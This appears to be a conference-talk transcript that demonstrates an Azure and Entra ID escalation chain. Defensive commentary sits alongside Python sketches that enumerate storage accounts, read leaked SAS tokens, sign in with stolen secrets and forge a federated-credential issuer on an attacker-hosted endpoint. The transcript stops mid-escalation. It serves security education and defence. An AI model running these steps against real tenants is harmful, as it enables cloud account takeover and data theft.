
From anonymous user to GA

BSides Limburg · 2026 · 57:26 · 26 views · Published 2026-04 · Watch on YouTube ↗
Category: Technical
Team: Red
Style: Demo
About this talk
In this demo-heavy session, Rogier and Stefan show an escalation path from an anonymous user to global admin, moving laterally from Azure to GitHub and ending in Entra ID. www.bsides-limburg.be
Transcript [en]

We are going to talk about going from anonymous user to global admin within 45 minutes. I think we need to thank our sponsors, so please all say thank you, otherwise we won't continue. All right, we're not going to continue. Who do you reckon? Thank you, I heard one. Okay, that's good enough. Who am I? Rogier Dijkman. I'm a cyber security architect working at Rubicon Cloud Advisor, which is a Dutch consultancy company. I'm a Microsoft Security MVP, for about three years now, in both security and identity. So even Microsoft thinks I know something about security and identities, which is fun. Next to that, I'm a cloud security researcher, so I do a lot of research

against cloud environments, mainly Entra and, um, what's your other crappy platform again? 365, Azure. Thank you. >> Very safe out of the box, by the way. >> Stefan Smith. I've been working at Rubicon Cloud Advisor for two years now, and we've been working together for way longer than that. And yeah, we do talks more often than this, but mostly at our own company for our own colleagues, and I got the opportunity and invitation from Rogier to speak here as well. So thanks. Cyber security architect, doing that for a couple of years now, really enjoy the work, and I'm mostly focused on the blue side of things, so blue teaming, and

he's more on the red teaming side of things, and that's also how we're going to do this session: we'll alternate between him attacking an environment and walking you through that (it will be very demo-heavy, so we'll show you a lot of commands and the data coming in), and then we'll switch to the defending side and show you how things are detected, or are not detected. And then we'll go from there and walk through an entire attack chain. And that's how we're going to start. First up, this is a website that was made. It's fictitious, but it does exist. You can visit the website if you want to book tickets for a flight. You can

also do that, because there's an API behind it. You can do it, just be a little bit smart about it, because this guy is watching. >> I had some people that went to this website, booked a flight, filled in their passport numbers, and then I had to send them an email. Luckily, they filled in their proper email address. Like, it's not a booking site, it's a phishing site. So, what shall I do with your credentials? They didn't answer, but I removed the data. Most of it. >> Yeah. >> Um, yeah. More about it later. >> Yeah, more about this website later. We'll end on this. We'll give you a little

challenge. That's where I'll end it for now. The company, Blue Mountain Travel, is, like I said, a fictitious company. We've done quite a few migrations of customers to new cloud environments, and this UK-based travel agency wants to move to a cloud-native environment, completely transitioning, but along the way they make some costly mistakes. We're going to expose the mistakes they made, and we're going to use some of the data we gain access to, to compromise their environment and go from anonymous user, so the reconnaissance stage, all the way up to global admin and full compromise of the environment,

hopefully. >> If the demo gods are with us, because like I said, it's a very demo-heavy session. The internet wasn't working quite well, so we're on a hotspot now. Let's hope that everything goes well. For the protection side of things, we'll be using a couple of the Defender products and Entra. I'll walk you through those once we get to the demos. It will be mostly Defender XDR related, some Defender for Cloud, Sentinel custom analytic rules, and you can see some of the log sources that we'll be using for those analytic rules today. Obviously, there's a lot more we can do in addition to what we're showing today. We're well

aware of that. If you have any questions regarding possible additions to the session, write them down. We'll try to do it in 45 minutes, and that leaves us with about 15 minutes for questions. So let's see where we end up, and then I'll hand it over to this man. All right. For those of you not familiar with Azure... >> Great. >> ...who calls himself an expert. >> Just one question, for the guy with the yellow shirt: if you ask a question and it's not a smart question, let me know. Okay. The attack chain we're going to follow is based on the MITRE ATT&CK framework. We start with a

reconnaissance phase and a collection phase, so two phases each time. After that, Stefan will explain how you can remediate it, protect against it, and detect it. After that, we go into initial access and discovery of an environment. Discovery means you're going to look around as a, hopefully, authenticated user. Depends on my demo gods. Then we're going to try to create persistence within the environment, and hopefully we can escalate ourselves to global admin well within, what's now, 35 minutes approximately. >> Yeah. >> Damn. Thanks for the long intro. >> 40 minutes before we hurry up. >> Good. Phase one and phase two. So the first phase we're going to start

with is reconnaissance and collection, and we've put the techniques under it. Oh, I can see it there as well. Cool. T1589. You don't need to remember anything with T15; I always forget them. What we're going to use today is project BlackCat. Maybe some of you have already heard of it, maybe you haven't. BlackCat is a PowerShell module that I've developed for pentesting Azure and Entra. You can use it as a blue teamer, as a red teamer, a purple teamer, or just as a malicious insider or somebody who wants to have fun in the weekend. It's all good. It's powerful. And why did I create a new PowerShell

module? There are a lot of modules out there, but a lot of them are outdated, using old APIs, and are easily detectable: they've got well-known signatures, they're using old API endpoints, or they use endpoints that are really noisy. So I tried to use APIs that Microsoft actually uses internally. We're using the batch API in the back end of Azure, because it looks like normal behavior. And we don't need to enumerate all subscriptions; we can do it at tenant root level. Same for Entra. But I'll show you a bit more about that. So, let's go to the live demo. Terminal. Yeah. Okay. As said, it's a demo-heavy session. So,

sometimes it goes well, sometimes it goes wrong. We were recording a YouTube video on Monday and Azure and the Graph broke down, and then we had some kind of challenge. Okay. So, first phase, when you do reconnaissance, in this case, and hopefully it will paste... yeah, we're going to look for DNS records. We know Blue Mountain Travel UK has got a website, but we haven't got a clue where this website is running. So the first phase is to do some recon on where the site can be. As you can see here, it outputs an MS record. There's a TXT record that starts with MS=, which

is a good indication for us that they are probably using a Microsoft environment, because they need to validate the ownership of the domain they have attached to that environment. So that's already good to know. The second step you want to execute here, and I'm looking at my tablet because I'm trying to copy-paste some of my commands... where are you? There we are. Okay. The second phase would be to do reconnaissance on all the Azure resources they have publicly exposed. Maybe you guys don't know this, maybe you do. Here we are. If you deploy an Azure resource like a storage account, a function app, a static web app, and

several others, they've got a public endpoint, because they need to be publicly resolvable. Like a storage account: you want to store something in a data center and retrieve it remotely, so it needs an endpoint. Even if that resource has got a private link to it, if it's VNet-integrated, it's still resolvable. Not always on an A record, but on a CNAME record you will find it. So that's good to know: even if it's privately linked, you can still resolve it. The same command. Is this the same command? Yeah, it's the same command. Thank you. That's why we do it together; I make a lot of mistakes in general. So instead of

now trying to resolve all the public IP addresses of all the resources, we're just going to assume that they are probably using a storage account. Here we are, pasting in the URL. Hey, you see, it's not okay. It's going to be a typing session.
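The storage-account hunt he is about to run can be sketched outside PowerShell as well. A minimal Python sketch, assuming a tiny made-up prefix/suffix dictionary (the real wordlist in such tooling is far larger): it generates candidate account names from the organisation name and checks whether their public blob endpoints resolve in DNS.

```python
import socket

# Hypothetical mini-dictionary; the module's real wordlist is far larger.
PREFIXES = ["", "dev", "prod", "stg"]
SUFFIXES = ["", "sa", "storage", "data", "backup"]

def candidate_accounts(org: str) -> list[str]:
    """Combine the organisation name with common prefixes/suffixes."""
    base = "".join(ch for ch in org.lower() if ch.isalnum())
    # Storage account names are at most 24 lowercase alphanumeric characters.
    return sorted({f"{p}{base}{s}"[:24] for p in PREFIXES for s in SUFFIXES})

def is_deployed(name: str) -> bool:
    """An account exists if its public blob endpoint resolves in DNS."""
    try:
        socket.gethostbyname(f"{name}.blob.core.windows.net")
        return True
    except socket.gaierror:
        return False
```

Because the endpoint check is a plain DNS lookup, it works anonymously and quietly, which is exactly the point the speakers make.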

I started using a MacBook about a year ago. Sometimes I love it, sometimes you regret it. You can guess which moment this is. >> Probably love it. >> You'll love it. Yeah. That's the funny thing. I've attached my tablet... here we are... come on... to my MacBook. I'm trying to get... yay, here we go. Okay. Paste. That's a better one. Okay. So, we're going to look for any public storage accounts deployed in the environment, because if we do all resources, it can take very long. There's a dictionary in the script that tries to add a prefix and a suffix to the name of the organization, in this case Blue Mountain Travel, and

it will give a shitload of results. So we just do storage accounts now for the sake of speed, because I've only got 45 minutes, somebody told me. This will take a couple of seconds, and it will look at combinations of Blue Mountain Travel and see if any storage account resolves. This is one of those moments where you hope your internet is still working. I think it is. Here we are. Yay. Okay. What we can see here is that the storage account bluemountaintravelsa, SA being a well-known suffix added to resources in Azure, is publicly available, and it's got a folder in there which is called

templates, but it says file count: zero. So, well, it's not very useful to look at an empty folder. The fun thing about this is that Microsoft is not really good at cleaning up old APIs. The functions now use a new API, but if you call the old API... oh no, it's the same command... you can say include empty folders, and you can say include deleted items. So what we are going to do... include deleted... I said Tab... it's a great module, it always works, as you can see... include deleted... deleted... doesn't make sense. >> Oh, okay. We're going to try another command. Here we go. Are you ready, guys?
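Listing a public container, including soft-deleted blobs via an older service version, comes down to a single anonymous REST call against the Blob service. A hedged sketch that only builds the request (the account, container, and pinned `x-ms-version` value are illustrative; which service versions return soft-deleted blobs depends on the account's configuration):

```python
def list_blobs_request(account: str, container: str,
                       include_deleted: bool = False) -> tuple[str, dict]:
    """Build an anonymous List Blobs request; include=deleted asks the
    service to also return soft-deleted blobs."""
    url = (f"https://{account}.blob.core.windows.net/{container}"
           "?restype=container&comp=list")
    if include_deleted:
        url += "&include=deleted"
    # x-ms-version selects which (possibly older) service API to talk to.
    headers = {"x-ms-version": "2019-12-12"}
    return url, headers
```

The response is an XML blob listing; no credentials are involved when the container allows public access, which is why this shows up as anonymous traffic in the logs discussed later.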

>> Okay. Get public blob content. Here we go. What we do with the other command is open up the storage account again, the Blue Mountain Travel one. We say we want to look into the container named templates, which is the empty container, and we call the old API to see if there are any deleted files in there. So if you use the old API, Microsoft suddenly shows you, as an anonymous user, that there are deleted files in the storage container, which is publicly accessible. Well, that is fun. And in this case, we see that there's an onboarding email in there. So you can probably already guess what we're

going to do: we see if we can download this file. So we add the download flag, and I add a file path, loot. And now the file is in my loot folder. So let's go: cd loot. It's in here. And we can see there's an onboarding email. So we do an Invoke-Item, which is a PowerShell command, and we open the onboarding email. Here we go. And now it opens up on my other Mac screen. Simply lovely. Here we go. What we can see here is that as an anonymous user, we were able to download a file from a storage account that is publicly exposed, which is really interesting, because

a normal user would think: well, I've deleted the file, so it's gone. Well, that's not always the case if you use the old APIs. Looking at this email, we can see it's a template email, probably for new hires. It's got a placeholder in there for the first name, and we see several links in there. Another good indication is that there's probably a docs folder within the storage account, and the naming is the first name and last name of the users in there, which gives us a good hunch that they've got more data within Azure and within the storage account. So let's see if we can

get more information out of that. So, for you guys: how would you get more information out of Azure as an authenticated user, without having credentials of a user? Nobody? That was your bottle; I'd be careful with that, because next time you'll have to say something. Okay. I'm not sure if you guys can read it, but if I hover over this link... come on, please... yeah. Is this readable for you guys? Is it readable over there? Okay. You see there's a long URI in here, which we'll also open up in the terminal in a minute, and it's got a SAS token in it. Do you all know what a SAS token is? A shared access token.
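A SAS token is nothing more than a set of query-string parameters appended to a URL, so you can read its scope straight off a leaked link. A small sketch that pulls out the fields worth checking (parameter names follow the SAS convention: sv, sp, se, sip):

```python
from urllib.parse import urlparse, parse_qs

def inspect_sas(url: str) -> dict:
    """Pull the interesting SAS parameters out of a shared link."""
    q = parse_qs(urlparse(url).query)
    first = lambda k: q.get(k, [""])[0]
    return {
        "version": first("sv"),      # service version the token was made for
        "permissions": first("sp"),  # r=read, l=list, w=write, d=delete, ...
        "expiry": first("se"),       # a multi-year expiry is a red flag
        "allowed_ip": first("sip"),  # empty means any source IP is allowed
    }
```

Exactly the defaults the speakers warn about show up here: broad permissions, a far-off expiry, and no source-IP restriction.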

Okay. A SAS token is a token generated by Azure which authenticates not a user, but just a system or an object. So if you add it to your link, you can say: I want to download this file, or see this file, based on a token that's valid for a certain period, from a specific IP address, with read access to the content. A lot of people don't understand that and just generate a SAS token with defaults, and then it's usable for two years and gets permissions on anything in the storage account, which is great for us. Let's close the file and go back to the terminal. Here we go. So what's the next thing we are going to

do? We're going to try to get the SAS token out of this file and see if we can use it: see what permissions it has, and then see if we can authenticate with it. So we do a Get-Content. Here we go. Cmd-C. Hopefully I'm not pasting the same command as the previous six times. Yes, of course I do. Can we tell a good joke? >> I don't have one. >> Well, that was one. >> All right. Get-Content. And what we wanted to see was the content of that welcoming onboarding email, right? Onboarding email. Okay. Get-Content. So if we look in here, we see

up here that there is a very long value. This is the name of the storage account, it's a file share link, we see the first name and the last name of the welcoming email, and at this part the SAS token starts. The sv=, that's an indication it's a SAS token, provided as a parameter to this URI. Still understandable, right? So what we can do, and I was grabbing the SAS token here... yeah... yep... okay. So what we'll do is pull out the SAS token, pull out the storage account name, and the docs file share. That's what I'm going to do right now. And hopefully this is going to copy. Copying. Copying. Go

back to the terminal. Terminal. Just going to clear the terminal. Yay, now it works. So, I've got the storage account name here, provided as a parameter within PowerShell. We've added a file share named docs, like we've seen in the onboarding email; there are probably more files in there. And we provided the SAS token. So what we can do now, now that we have the authentication token, is see what's in that file storage as an authenticated user. So, here we go. And now we suddenly see that there are several user folders in there. We've got Bridget Jones in there. We've got Bruce Banner in there. Some other very famous names. Maybe you know them, maybe you don't.
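Listing the share contents with the leaked token boils down to the Azure Files "List Directories and Files" operation with the SAS appended. A sketch that only constructs the URL (the account and share names are the fictitious ones from the demo; a real caller would also percent-encode the path):

```python
def list_share_url(account: str, share: str, path: str, sas: str) -> str:
    """Build a List Directories and Files request for Azure Files,
    authorised by the SAS token instead of user credentials."""
    prefix = f"https://{account}.file.core.windows.net/{share}"
    if path:
        prefix += f"/{path.strip('/')}"
    return f"{prefix}?restype=directory&comp=list&{sas.lstrip('?')}"
```

Because the SAS signature covers the whole share, the same token that came with one onboarding email opens every user folder in it.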

So that's already interesting. Now we can go into these folders and download the files that are in there. There are two interesting things: we see the user folders, so there's probably some more user information in there, and we've got a config folder, which hopefully also has some configuration files in there. Now I'm going to scroll down to the next command, which is not on my screen. I lost my command screen. That's fun. Here we go. Any questions so far? No questions at all. Okay. >> Okay. So for all of the things that Rogier is showing just now, we'll switch to the blue teaming side in a second. One of

the things you'll see is that for the reconnaissance phase there are quite a few things you can do, such as using Defender for Cloud. You can enable it on storage accounts, which is called Defender for Storage, and if you enable that, you are able to see publicly accessible storage accounts being accessed by anonymous users. That was the first stage he showed. I'll show in a slide in a second how you can enable it, and what kind of incident comes out of that. And the same goes for collecting the file afterwards, or reading from that public storage: that's not actually something that's natively detected,

even though something like that probably should be natively detected. And there are a lot of things you can do as an anonymous user that are not natively detected. The goal of this presentation is to show you that just the standard implementation of the Microsoft stack is not going to cut it for the environment. It's simply not safe enough. You ready to go? >> Yep. I said I didn't pay my demo gods enough, because the internet connection was dropping. We've got it back again, so that's good. The file was not being updated. Here we go. So we're going to paste in the next command, because the

commands are a bit long. We do a copy here, we go back to this screen... where is the screen, man?

It's crazy, isn't it? >> Yeah. >> You know, we're just going to extend the screen differently in a second. Or I'm just going to type. Here we are. >> Paste. >> Here we are. So what we are going to do now is get the file share content of the folder Peter Parker: the storage account name again, the variable we used previously; we look in the file share, which is the docs folder; and the path is Peter Parker. We use the SAS token again, and we're also going to download the files. So what you will see now: these are the files that we can download with the SAS token, as

the authenticated user. We were not able to see this as the anonymous user, but because we have the SAS token, we can get these files out. We can do the same for the config folder that's in there. Remember, we've seen the config folder. Okay. So let's go back and change this path to the config folder. And what we see in the config folder is that there's an appconfig.bak file. So apparently they've used this environment to configure something, to deploy something, and put a .bak file in there. They thought: well, it's all in an authenticated folder, so nobody's going to find it. Well, guess what, we were just able to get it out. So,

this is where I hand it to you, and we'll go back to the PowerPoint slides, because we were able to exfiltrate data as an anonymous user, and based on that information, we went to the next phase and got some more files out of there. >> All right, thanks. Like I said just now, one of the simplest things you can do within an Azure environment is enabling Defender for Cloud. Having it enabled will result in what you see on the screen right now: the publicly accessible storage container has been exposed. It'll scan your storage accounts to see whether they are exposed to the internet, and that's one of the first indications you'll get. The

moment you see this, you can act on it. Meaning that if you act on it, the entire thing we're presenting today will be a lot harder, or simply impossible. That's the first thing. Then, let me have a look. Here we go. Custom detections for storage. >> Yeah, it's an interesting one. For a custom detection based on a storage account, to validate that anyone downloaded any files, we need to set the storage account diagnostics, which are not on by default. If you deploy a resource within Azure, it doesn't log to Log Analytics, and if you've got Defender for Cloud it does some detections, but it doesn't detect a

lot. So you really need to go into the settings. I'm not sure if that's the next screen, where you can configure it. >> I think so. >> Oh yeah, there it is. So you need to go into the activity log settings, where you explicitly need to say: we want to forward the read, write and delete actions on a storage account and send them to a Log Analytics workspace. In this case, Microsoft Sentinel is deployed. Are you familiar with Microsoft Sentinel, the security product? Yeah, cool. Well, that's where the data goes. Then you've got the data there, but you just have the data. You still need some detection analytics. I think that's where you can

pick it up. >> Yeah. Thanks. So once you have all of the data, you can clearly use that data to write KQL queries, Kusto Query Language queries, in order to break down that data and pick up the data you want to show inside of an incident, for example. So suspicious behavior is very much detectable in regards to the attack that was just shown. In addition to that, Rogier has just shown the anonymous enumeration on a storage account, and yet again, doing anonymous enumeration on storage accounts, be it multiple storage accounts or a single one, all of this is detectable from the data. And lastly, to complete, I think it's

the completion of what he just showed: you can also see the successful collection and download of the file. I'm not entirely happy with the naming of the incident, but that's just what it is for now. Again, you can detect all of this stuff, and the moment you detect all of these steps, you can attach automation to each step to interact or to stop the attack. I'll skip the demo because of the time. >> I got 45 minutes. Yeah. >> I know. >> I was [ __ ] around, so it took a bit longer. >> All right, let's go to prevention. Within Azure, it's possible to configure Azure policies. These are your guard

rails. You can deny the configuration of public access on a storage account. Sure, in some cases you might want some of your stuff to be publicly accessible, but you can always work with exemptions. So at least you'll have some governance in place to manage whether something is publicly exposed or not, by creating a deny policy, for example, or at the very least an audit policy, so you can see that it's publicly exposed. You can make your environment a lot safer. In addition, by enabling Defender for Cloud you'll also get security recommendations. Security recommendations are basically the scanning of your resources within an

environment. In this case, we're focusing on Defender for Storage, which is a product within Defender for Cloud, and there are a lot of recommendations that can come out of that if you have a poor configuration. So at least you'll be able to see what you're doing, or what someone else has been doing if they're making mistakes. And lastly, there's supposed to be secret scanning on files stored within your storage accounts, but it does not work properly. >> Yeah. So based on the information that's in the files in the Azure infrastructure, like an application ID, a tenant ID, and some secrets, Microsoft should be able to scan the

data and flag an alert like: hey, I found some sensitive data, it's in a storage account container, which isn't right. And the freaking container is even publicly exposed. So they created a sensitive data product. It doesn't flag it, so it doesn't work. You can pay $10 per month, but don't pay it for this. We've opened up a ticket with Microsoft, I think about six weeks ago. We got a confirmation that we've opened the ticket, and we're still waiting for a response: whether they're going to fix it, or remove the product, or I don't know what. It also applies to the other files. So, if you remember, we

also got a file downloaded from Peter Parker's folder. It's got an email address in there and a default password. The password that was in there, if you paid attention to it, is actually valid; it works. And even that is not being scanned by Microsoft. If you put a password somewhere on GitHub, Microsoft's secret scanning will catch it, that's okay, but as long as you have it in your own infrastructure, they're probably not able to detect it. So: great product, it's got great potential, they've put a lot of time and effort in it, but I think it needs some work. Go ahead. Um, so we've got two files. We've got the file of Peter Parker,

an email address with credentials, and we've got the application secrets. I didn't show the content of the app secret file, but there is an application ID and application secret in there. I'll show you in a bit. On to the question: are we going to follow the attack path using the app secrets or the user credentials? >> Yeah. >> Apps? Hands up for apps. >> Okay, that's very clear. >> Hands up for users. >> Just one. I'm sorry, you lost. >> Yay, they lost. All right. Anyway, I don't remember how we were going to handle this vote, because if you had all said user credentials, there would be no turning back; we were going to go for app secrets anyway. Here we go. Phase three and four.
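Signing in with a leaked application secret is the standard OAuth2 client-credentials flow against the Entra token endpoint. A sketch that builds the request without sending it (the ARM scope is one plausible choice; the demo tooling may request other audiences):

```python
def client_credentials_request(tenant_id: str, client_id: str,
                               client_secret: str) -> tuple[str, dict]:
    """Build the OAuth2 client-credentials request a service principal
    uses to sign in with a leaked application secret."""
    url = f"https://login.microsoftonline.com/{tenant_id}/oauth2/v2.0/token"
    body = {
        "grant_type": "client_credentials",
        "client_id": client_id,
        "client_secret": client_secret,
        # Audience for Azure Resource Manager; Graph would be another choice.
        "scope": "https://management.azure.com/.default",
    }
    return url, body
```

The response contains a bearer access token, which is all an attacker needs: no MFA, no interactive sign-in, just the three values from the leaked config file.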

We're going to do the initial access, and we're going to do discovery. So, like we just said, we found the credentials in the app registration files, the app credential files, and we did the Peter Parker files, or Bridget Jones, or the one that you like. If you like to cry and eat chocolate, you need to watch Bridget Jones, but that's a different session. We are now going to use the credentials that we found, which is the initial access phase, and we're going to do discovery, where we see if we can use the credentials to enumerate resources in either Azure or Entra. Please pray with me again, or

just stamp your feet on the ground, so all the demo gods will be happy and hopefully copy-pasting is going to work a lot better now. All right, you all want it to go wrong; nobody's clapping. Okay, back to the tablet. So, the next phase... do you first want to see the content? By the way, it's a config file. I want to authenticate with the credentials, but maybe it's fair to show you what's in there. Okay. >> Get-Content, and it was the config folder. I thought it was in the config folder, right? Yeah. cd config. As you can see, I'm an old Windows user.
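The config file he is about to open is exactly the kind of content the secret scanning discussed earlier should flag; at its core, such scanning is pattern matching over file contents. A deliberately crude sketch (real scanners use far more precise rules plus entropy checks):

```python
import re

# Rough illustrative patterns only.
GUID = re.compile(r"\b[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-"
                  r"[0-9a-f]{4}-[0-9a-f]{12}\b", re.I)
ASSIGNMENT = re.compile(r"(?i)(secret|password|key)\s*[:=]\s*(\S+)")

def scan_for_secrets(text: str) -> list[tuple[str, str]]:
    """Return (kind, match) pairs for values that look like credentials."""
    hits = [("guid", m.group(0)) for m in GUID.finditer(text)]
    hits += [(m.group(1).lower(), m.group(2))
             for m in ASSIGNMENT.finditer(text)]
    return hits
```

A tenant ID and client ID are GUIDs, and a client secret typically sits right next to a `secret=` style key, so even this crude pass would light up on the demo's appconfig.bak.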

I still use cd. But we do a Get-Content, and that's the app secret file. So if we look into this configuration file, you can see there's a tenant ID in there, there's a subscription ID in there, a client ID and a client secret. That's what you can use to authenticate. Yes, these are valid. Please don't take any pictures and try to abuse it, because I will find you based on your IP address. And we've got some other interesting information in here. What is also interesting to see is that it's probably for an app for the... don't take a freaking photo! >> All right. He's driving a Jaguar Cabriolet. So, >> if somebody screws up the session,

that's his car. >> Let's not make threats. They are probably using this for some kind of HR application, because it's got an app service, HR Portal Pro, in there. So that's going to be fun. We are going to use these credentials now to log in, on the other screen. Here we go. Clear. >> Yeah, we've still got about 15 minutes, so I'm not sure if we're going to make it within those 15 minutes. Do you guys mind if we stretch it for five minutes? No? Okay, thank you. Yes. Clear. It's because you didn't clap for the demo gods, you know that. Otherwise we'd have made it. All right. We're going to copy

the commands. These are the credentials that we're going to use. Here we go. Where's my mouse? There it is. So we're pasting in the credentials, and we use the BlackCat connect service principal function with the parameters we set previously. It takes a couple of seconds, and now we are authenticated as the HR legacy deployment. These are the credentials we found in the app config file, which is interesting, because now we can probably do something with the HR application credential that we've just found. And by the way, the picture you just took, that was the wrong credential. This is the right credential. >> Okay. >> Somebody abused it in a previous

session, so I think I need to change it because of that. So what would you guys do if you got credentials for an environment? What's the first thing you're going to do with those credentials? Anyone? You would go and see what kind of permissions these credentials have. So we use the get role assignments function. This is one of the functions within BlackCat, because it works at tenant level: with it, we enumerate all the permissions for a specific identity within a tenant. I've run this at a very big insurance company that had about 200 subscriptions and about 30,000 identities with role assignments. It took about two minutes to get every role assignment in the environment. In

this case, we see we are authenticated with the service principal. That's correct; we just used it above. And we can see that this account has Contributor permissions on a subscription. That makes it interesting, because as a Contributor I'm able to modify any resource within the scope, either the subscription or a resource group. So what we want to do now is see if we can get anything like managed identities. Do you all know what a managed identity is? Yeah? Okay. For the ones that don't know: usually you use an app credential, where you need a client ID and a client secret, something like a password, and like in the previous session you've seen,

great session by the way, we are trying to avoid using passwords. So Microsoft came with a great idea: let's skip passwords, and we can use certificates or federated credentials. We've got two types of managed identities: one is system-assigned, the other one is user-assigned. System-assigned managed identities are attached to a resource. If I deploy a virtual machine within Azure and I want to get some secrets from a vault, a Key Vault, we say that the identity of the virtual machine is allowed to get the secrets from the Key Vault. That works fine; you only need to configure role-based access once. But if you throw away the virtual machine and you

create a new virtual machine by infrastructurees code, you're not able to get into the default anymore because it's got new identity. Then they came with a great ID. Let's use user assign manage identities because you can attach it to the resource to the virtual machine. You drop the virtual machine, deploy the virtual machine, attach the user assigned credentials and you still have access to the default. Um, one of the other great things in that is that we can use federated credentials. Um no. >> Yeah, you met there. >> I'm there. >> Here we are. Okay. Um, federated credentials in is another great part um within a user sign manage identity um because then you say well I've got a

identity and we want to deployment from GitHub but we don't want to store those secrets of a identity in GitHub. Zoe is a federation. We say, well, this GitHub repo on this GitHub organization, we're going to trust. So, if we request a token from Entra, yeah, we've got a trust. That's all fine with me. So, what we're going to do now, and is I did Oh, that's not this command. Let's clear it up. And this is a longer command. We got an ID in there. Copy. We're going to see what the permissions of this user sign manage identity is. So here we go. So the user sign manage identity has got read write permissions all application

The user-assigned managed identity has got Application.ReadWrite.All, Group.Read.All and User.ReadWrite.All — which is a lot of permissions. So what if we were able to authenticate as that user-assigned managed identity? That would be fun, right? Well, that makes it a bit more difficult, because we'd need to attach it to a resource — but we don't want to create new resources within Azure, because then we'd make a lot of noise, they'd probably notice the resource creation, detections would go off, and a lot of other things we don't want. Oh, wrong command — Ctrl+C, clear. So what we are going to do first

is see if this user-assigned managed identity they are using actually has a federated credential configured. So we run the get-federated-identity-credential command for this user-assigned managed identity. Hit enter, pray to the gods. Here we go — yep, I found it. And the federated credential on here is the Blue Mountain Travel HR onboarding portal: this GitHub organization, this GitHub repo, and it trusts the main branch of the repo. So if I do a deployment from there, it will work. Then I came up with the question: okay, that's interesting, but how do federated credentials actually work within Entra?
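Enumerating the federated credentials on a user-assigned managed identity comes down to one ARM call; the speakers' tooling presumably wraps something like this. A sketch of how the URL is built — subscription, resource group, and identity name are hypothetical:

```python
ARM = "https://management.azure.com"

def list_federated_credentials_url(subscription_id: str,
                                   resource_group: str,
                                   identity_name: str) -> str:
    """ARM endpoint that lists federated identity credentials on a
    user-assigned managed identity (GET with a bearer token)."""
    return (
        f"{ARM}/subscriptions/{subscription_id}"
        f"/resourceGroups/{resource_group}"
        "/providers/Microsoft.ManagedIdentity"
        f"/userAssignedIdentities/{identity_name}"
        "/federatedIdentityCredentials?api-version=2023-01-31"
    )

url = list_federated_credentials_url(
    "00000000-0000-0000-0000-000000000000", "rg-hr-portal", "uami-deploy")
```

The response lists each credential's issuer, subject, and audiences — here, the GitHub org/repo and branch the demo found.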

And the thing I'm going to show you guys now is pretty new — I think I released the proof of concept about two weeks ago. Okay. >> So, as said, you need to create a federated credential to trust a federated endpoint, which is either GitHub or Azure DevOps or anything else. But if you look at the authentication process: when you add a federated endpoint, Entra will look at a well-known endpoint — within that well-known location there is a file that explains what kind of environment you're trying to connect to. So what I did: I created a storage account in my own tenant, within that storage account I placed a self-signed certificate, and I created a well-known file. The

fun thing about that is that Microsoft is not validating the chain of trust of the certificate. So what I can do now — uh, this is the wrong… why is it not — is run my function, invoke federated token exchange, and we will temporarily add the storage account as a federated endpoint and see if we can dump the credentials of that user-assigned managed identity. Okay, you guys still follow me? Yeah? Okay. So: invoke federated token exchange. We hit enter. Now we wait for a couple of seconds — it will add the storage account as the federated endpoint. There, it's done. And what we get back is an access token: the bearer token, a JSON Web Token.
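The rogue-issuer trick rests on two documents: an OIDC discovery file the attacker hosts on the storage account, and the federated-credential entry that points the managed identity at it. A sketch of both payload shapes, with hypothetical issuer and subject values — this mirrors the general OIDC federation format, not the speakers' exact proof of concept:

```python
def build_openid_configuration(issuer_url: str) -> dict:
    """Minimal OIDC discovery document the attacker-controlled storage
    account serves at {issuer}/.well-known/openid-configuration."""
    return {
        "issuer": issuer_url,
        "jwks_uri": f"{issuer_url}/jwks",  # keys incl. the self-signed cert
        "response_types_supported": ["id_token"],
        "subject_types_supported": ["public"],
        "id_token_signing_alg_values_supported": ["RS256"],
    }

def build_federated_credential(issuer_url: str, subject: str) -> dict:
    """PUT body that registers the rogue issuer on the managed identity
    (the step the Contributor role makes possible)."""
    return {"properties": {
        "issuer": issuer_url,
        "subject": subject,  # must match the sub claim of the forged token
        "audiences": ["api://AzureADTokenExchange"],  # Entra's fixed audience
    }}

issuer = "https://attacker.blob.core.windows.net/issuer"
cfg = build_openid_configuration(issuer)
fic = build_federated_credential(issuer, "poc-subject")
```

Because the demo shows the chain of trust of the self-signed key is not validated, any token signed with that key and matching issuer/subject passes the exchange.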

This is the token of a user-assigned managed identity without attaching it to any resource. According to Microsoft, this shouldn't be possible. Well, as you guys can see, we can do it. So, if you remember correctly: we logged in with an app registration, and that app registration had Contributor permissions on a resource within Azure. What we did now was modify that resource — because we're Contributor — add an endpoint to it, and get the credentials of that identity. So now we can try to see if we can log in with the new account. But to do that, we first need to run this again. Yep. My partner just said we have only 10 minutes left. So, we're going to extend the session

by about 10 minutes. Nobody complains? >> No room for questions then, I guess. >> Okay, we're going to run it again. I'm just going to put the token in a variable; otherwise I need to copy-paste the value there. And I think we're not going to make it within 45 minutes — we're going to be global admin within 55 minutes, which is still fun. Okay, we've got the bearer token placed in a variable. We paste it and say: okay, I want to connect with a bearer token right now. Here we are. And we are now authenticated as the user-assigned managed identity against the Graph — but we're still not a global admin, correct?
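A bearer token like the one just obtained is simply a JWT, so its claims can be inspected locally without verifying the signature — handy for confirming which identity you actually hold. A small helper, demonstrated on fabricated demo claims rather than a real managed-identity token:

```python
import base64
import json

def decode_jwt_payload(token: str) -> dict:
    """Return the claims of a JWT *without* verifying its signature."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)  # restore stripped base64url padding
    return json.loads(base64.urlsafe_b64decode(payload))

def _b64url(obj) -> str:
    """Base64url-encode a JSON object, padding stripped (JWT style)."""
    return base64.urlsafe_b64encode(json.dumps(obj).encode()).decode().rstrip("=")

# Hypothetical claims resembling an app-only token; not a real token.
demo_token = ".".join([
    _b64url({"alg": "RS256", "typ": "JWT"}),
    _b64url({"aud": "https://graph.microsoft.com", "idtyp": "app",
             "oid": "11111111-1111-1111-1111-111111111111"}),
    "fake-signature",
])
claims = decode_jwt_payload(demo_token)
```

In a real token, the `oid` claim is the service principal's object ID and `aud` tells you which API the token is good for.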

>> Do you want to say something about this? >> You're definitely correct. We haven't added those permissions yet. However, we are capable of adding them now, and that's what we'll show you. >> So, we had the app role assignment permission — AppRoleAssignment.ReadWrite.All — on the user-assigned managed identity, as you remember. Uh, this is a— oh, where's my terminal? Come on. >> It's on the side. >> Where is my terminal? There it is. Okay. It had app role assignment permissions, which actually means that this user-assigned managed identity can assign permissions to other objects within Entra — including itself. So what we do is provide the UID

